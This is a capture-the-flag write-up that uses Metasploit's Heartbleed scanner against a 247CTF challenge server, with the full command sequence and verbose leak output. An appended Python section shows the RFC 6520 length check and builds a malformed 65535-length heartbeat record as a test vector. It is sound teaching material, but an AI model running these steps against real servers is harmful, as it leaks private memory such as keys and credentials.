This is my write-up of a Misc challenge Sensitive Server Memory on the CTF site 247CTF.com.
The webserver for this challenge is storing sensitive data in memory. Can you read it? Did anybody patch since 2014?
The greatest bug of 2014 was Heartbleed, so let's start with that.
Spin up your Kali Linux and enter Metasploit.
kali@kali:~$ msfconsole
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v5.0.72-dev ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 >
Search the exploit database for anything heartbleed related:
msf5 > search heartbleed
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssl/openssl_heartbleed 2014-04-07 normal Yes OpenSSL Heartbeat (Heartbleed) Information Leak
1 auxiliary/server/openssl_heartbeat_client_memory 2014-04-07 normal No OpenSSL Heartbeat (Heartbleed) Client Memory Exposure
Select the auxiliary/scanner/ssl/openssl_heartbleed module:
msf5 > use 0
Check which options need to be set:
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > options
Module options (auxiliary/scanner/ssl/openssl_heartbleed):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMPFILTER no Pattern to filter leaked memory before storing
LEAK_COUNT 1 yes Number of times to leak memory per SCAN or DUMP invocation
MAX_KEYTRIES 50 yes Max tries to dump key
RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
STATUS_EVERY 5 yes How many retries until key dump status
THREADS 1 yes The number of concurrent threads (max one per host)
TLS_CALLBACK None yes Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
TLS_VERSION 1.0 yes TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)
Auxiliary action:
Name Description
---- -----------
SCAN Check hosts for vulnerability
Set rhosts to the domain provided by the challenge:
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 202f6701de93bfbe.247ctf.com
rhosts => 202f6701de93bfbe.247ctf.com
Set rport to the port provided by the challenge:
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 50071
rport => 50071
We need verbose set to true, so we can see the data that is leaking:
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true
Run the scanner module:
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
[*] 144.76.74.118:50071 - Leaking heartbeat response #1
[*] 144.76.74.118:50071 - Sending Client Hello...
[*] 144.76.74.118:50071 - SSL record #1:
[*] 144.76.74.118:50071 - Type: 22
[*] 144.76.74.118:50071 - Version: 0x0301
[*] 144.76.74.118:50071 - Length: 86
[*] 144.76.74.118:50071 - Handshake #1:
[*] 144.76.74.118:50071 - Length: 82
[*] 144.76.74.118:50071 - Type: Server Hello (2)
[*] 144.76.74.118:50071 - Server Hello Version: 0x0301
[*] 144.76.74.118:50071 - Server Hello random data: 20fe119d01d3ac29d5c59761e743d5d48ca8acfd23060efbff11cea2b68c08f7
[*] 144.76.74.118:50071 - Server Hello Session ID length: 32
[*] 144.76.74.118:50071 - Server Hello Session ID: 44fa4cb2ca1d11afa085d439bd12e8f023e7155f5923c41bf93d8b9b3e64ed82
[*] 144.76.74.118:50071 - SSL record #2:
[*] 144.76.74.118:50071 - Type: 22
[*] 144.76.74.118:50071 - Version: 0x0301
[*] 144.76.74.118:50071 - Length: 821
[*] 144.76.74.118:50071 - Handshake #1:
[*] 144.76.74.118:50071 - Length: 817
[*] 144.76.74.118:50071 - Type: Certificate Data (11)
[*] 144.76.74.118:50071 - Certificates length: 814
[*] 144.76.74.118:50071 - Data length: 817
[*] 144.76.74.118:50071 - Certificate #1:
[*] 144.76.74.118:50071 - Certificate #1: Length: 811
[*] 144.76.74.118:50071 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name CN=127.0.0.1,OU=infra50,O=247CTF,C=US>, issuer=#<OpenSSL::X509::Name CN=127.0.0.1,OU=infra50,O=247CTF,C=US>, serial=#<OpenSSL::BN:0x0000558d6e19f950>, not_before=2019-02-12 21:20:09 UTC, not_after=2069-01-30 21:20:09 UTC>
[*] 144.76.74.118:50071 - SSL record #3:
[*] 144.76.74.118:50071 - Type: 22
[*] 144.76.74.118:50071 - Version: 0x0301
[*] 144.76.74.118:50071 - Length: 331
[*] 144.76.74.118:50071 - Handshake #1:
[*] 144.76.74.118:50071 - Length: 327
[*] 144.76.74.118:50071 - Type: Server Key Exchange (12)
[*] 144.76.74.118:50071 - SSL record #4:
[*] 144.76.74.118:50071 - Type: 22
[*] 144.76.74.118:50071 - Version: 0x0301
[*] 144.76.74.118:50071 - Length: 4
[*] 144.76.74.118:50071 - Handshake #1:
[*] 144.76.74.118:50071 - Length: 0
[*] 144.76.74.118:50071 - Type: Server Hello Done (14)
[*] 144.76.74.118:50071 - Sending Heartbeat...
[*] 144.76.74.118:50071 - Heartbeat response, 65535 bytes
[+] 144.76.74.118:50071 - Heartbeat response with leak, 65535 bytes
[*] 144.76.74.118:50071 - Printable info leaked:
############## FLAG in the leaked data
[*] 202f6701de93bfbe.247ctf.com:50071 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) >
Bingo!
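As an added illustration (not part of the original write-up), here is the bounds check that the Heartbleed fix introduced, written in Python: before echoing a heartbeat, the server must verify that the claimed payload_length fits inside the record it actually received, which is exactly what the unpatched server above fails to do when it answers with 65535 bytes. The two sample records are constructed inline for the validator; the 0x0301 version field matches the TLS 1.0 handshake shown in the Metasploit output.

```python
import struct

TLS_HEARTBEAT = 24   # TLS content type for heartbeat messages (RFC 6520)
HB_REQUEST = 1
HB_RESPONSE = 2
MIN_PADDING = 16     # RFC 6520 requires at least 16 bytes of random padding


def parse_heartbeat_record(record: bytes) -> dict:
    """Parse one TLS record carrying a heartbeat message and apply the
    RFC 6520 length check. Unpatched OpenSSL trusted payload_length and
    copied that many bytes out of its own memory into the response."""
    if len(record) < 5:
        raise ValueError("truncated TLS record header")
    content_type, _version, rec_len = struct.unpack("!BHH", record[:5])
    body = record[5:]
    if content_type != TLS_HEARTBEAT:
        raise ValueError(f"not a heartbeat record (content type {content_type})")
    if len(body) != rec_len:
        raise ValueError("record length field does not match bytes received")
    if rec_len < 3:
        return {"valid": False, "reason": "heartbeat message too short"}
    hb_type, payload_len = struct.unpack("!BH", body[:3])
    # The check the fix added: claimed payload + 3-byte heartbeat header
    # + minimum padding must fit in the record; otherwise discard silently.
    if payload_len + 3 + MIN_PADDING > rec_len:
        return {"valid": False, "type": hb_type, "claimed": payload_len,
                "actual": rec_len - 3, "reason": "payload_length exceeds record"}
    return {"valid": True, "type": hb_type, "claimed": payload_len,
            "payload": body[3:3 + payload_len]}


def build_test_record(hb_type: int, payload: bytes, length_field: int = -1,
                      padding: int = MIN_PADDING) -> bytes:
    """Construct a TLS 1.0 heartbeat record as a validator test vector.
    length_field overrides the payload_length field so a test can model a
    message whose declared length overstates the bytes actually sent."""
    length = len(payload) if length_field < 0 else length_field
    hb = struct.pack("!BH", hb_type, length) + payload + b"\x00" * padding
    return struct.pack("!BHH", TLS_HEARTBEAT, 0x0301, len(hb)) + hb


# Constructed samples: a well-formed 4-byte heartbeat and one whose length
# field claims 65535 bytes, the size of the leak seen in the scan above.
BENIGN = build_test_record(HB_REQUEST, b"ping")
MALFORMED = build_test_record(HB_REQUEST, b"ping", length_field=65535)

if __name__ == "__main__":
    print(parse_heartbeat_record(BENIGN))
    print(parse_heartbeat_record(MALFORMED))
```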